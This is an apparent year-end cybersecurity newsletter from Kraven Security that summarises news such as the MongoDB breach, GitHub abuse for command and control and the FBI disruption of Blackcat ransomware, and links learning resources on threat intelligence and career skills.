Hello there 👋
Welcome back to the Kraven Security weekly newsletter. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
The final week before Christmas has gone out with a bang. We saw adversaries using new tradecraft as they abuse GitHub for command and control, the FBI executing a major disruption operation against the Blackcat (ALPHV) ransomware gang, and the Lapsus hacker getting a life sentence to hospital.
At Kraven we have continued our series on cyber threat intelligence (CTI) definitions and key concepts. The series is focused on providing you with the fundamental knowledge and language to succeed in CTI and we look forward to releasing more articles in 2024!
Let’s jump into this week’s top news stories.
Top 5 News Stories
Story #1: MongoDB Comes Under Attack
The database company MongoDB disclosed a recent cyber attack that led to the exposure of customer data. The company detected the breach Wednesday (December 13th) and found the hacker gained access to customer account metadata and contact information. The investigation is still ongoing. MongoDB recommend:
- “be vigilant of social engineering and phishing attacks”
- “implement MFA” if you are not already doing so
Source: Bleeping Computer
Story #2: The Top 7 Trends Shaping Software as a Service (SaaS) in 2024
As we round out 2023, let’s take a look at the top 7 trends shaping SaaS security in 2024 according to The Hacker News. As SaaS becomes the backbone of corporate IT, it’s crucial to stay updated on the latest developments in security. Here are the top trends influencing the state of SaaS Security for 2024 — and what you can do about it.
Source: The Hacker News
Story #3: Hackers Abuse GitHub to Evade Detection and Control Victims
Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages. Adversaries have occasionally used public infrastructure services (e.g. Dropbox, Google Drive, OneDrive, Discord, etc.), but using GitHub represents an evolution in this trend. The abuse of Git Gists and commit messages for command delivery is an emerging threat to be aware of.
Source: Reversing Labs
Story #4: FBI Disrupts Blackcat (ALPHV) Ransomware Operations
The FBI achieved a significant milestone in the fight against cyber threats by disrupting the Blackcat ransomware operation and creating a decryption tool. The US security service managed to conduct operations that led to them gaining access to ALPHV’s infrastructure, siphon decryption keys, and help 500 victims recover their files for free (saving approximately $68 million in ransom demands).
Source: US Department of Justice (DOJ)
Story #5: Lapsus$ Hacker Sentenced Indefinitely to a Hospital
Hacker Arion Kurtaj who was one of the leading members in the Lapsus$ hacking group has been sentenced to life in a secure hospital. The teenager was involved in the group’s hacking spree in 2022-2023 which saw them compromise Rockstar Studios (makers of Grand Theft Auto), Nvidia , BT/EE, Samsung, and more.
Some people (mainly outside of the cyber community) are calling for the kid to get a job. However, this is a stark reminder of the responsibility and trust needed to be considered a cyber security professional. As this kids found out, play stupid games and win stupid prizes.
Source: BBC News
Feature Article
Excited to share this quick guide to Cyber Threat Intelligence (CTI)!
You’ve heard about CTI, but do you really know what it is and how it empowers organizations in the cyber security landscape? This quick guide demystifies CTI, diving into its key components and how it’s used. Discover how CTI enhances security operations, streamlines incident response capabilities, and more!
Dive in and learn more about CTI here.
Learning Resources
IAM and Detection Engineering
Sekoia released a great article this week that dives into the importance of IAM event detection, explaining why it is essential in today’s cybersecurity world and how it can enable organizations to proactively protect their systems, data and sensitive information. Check it out if you have a role in securing any cloud environment!
Source: Sekoia
Triad of Success: Education, Experience, and Networking
Wade Wells walks you through how to be successful in the cyber security industry by combining education, experience, and networking. Definitely worth a watch if you are looking to jump into the industry or move up the ladder.
Microsoft Releases Incident Response Guide
Microsoft has released an updated incident response guide that details the best practices for security teams and leaders! The guide walks you through all the stages of an incident, from planning to remediation, and uses a real-life example for demonstrations. Give it a read if you have to respond to cyber incidents in your organization.
Source: Microsoft Security
Comptia Security+ Exam Practice Questions and Tips
The CompTIA Security+ exam tests your cyber security knowledge across a wide range of topics to ensure you are ready for an entry-level role. The best way to prepare for this exam is by studying and answering CompTIA Security+ practice questions.
Practice questions help you assess your current knowledge, allow you to identify areas that need improving, and let you accurately determine if you are ready to take the real exam. They are an essential piece of preparing for your Security+ exam.
This article gives you a taste of what to expect on the real exam by providing multiple-choice and performance-based (PBQ) practice questions. You can interactively test your knowledge using these questions across all five of the Security+ domains. This is not an exhaustive list of everything you will be tested on in the Security+ exam. Just a glimpse of what to expect.
Source: StationX
Learn to Deploy AWS Resources with Terraform
This demonstration shows you how to use an Infrastructure as Code (IaC) tool (Terraform) to create an AWS development environment. The automated deployment of lab environments is a huge topic in cyber security and a useful skill to master.
Elevate Your Cyber Threat Intelligence Skills for Free
MITRE has awesome free training that covers what the MITRE ATT&CK framework is and how you can use it for threat intelligence. The material is delivered in video lectures you can easily follow along with and even includes exercises for you to practice your new skills.
Source: MITRE ATT&CK
Personal Notes
🤔 That will do it for 2024! At Kraven we are taking a break for the holidays, no article or newsletter next week unfortunately. However, we will be back at starting the first week in 2024 and hope you are ready for more great learning content.
This year has been a rollercoaster at Kraven. The company was founded, we built a website, and started a newsletter! This allowed us to reach our aim of delivering high value content around cyber threat intelligence, threat hunting, and crafting custom tools. In 2024 we want to continue this effort and expand our content offering. We plan on delivering more content, better content, and even expanding to new platforms like YouTube. Till then happy holidays everyone!
P.S.
I encourage everyone to take a break over Christmas and recharge their batteries. Cyber security is a challenging industry that can wear you down. Taking care of yourself and getting away from the computer occasionally is important. Have a great Christmas!
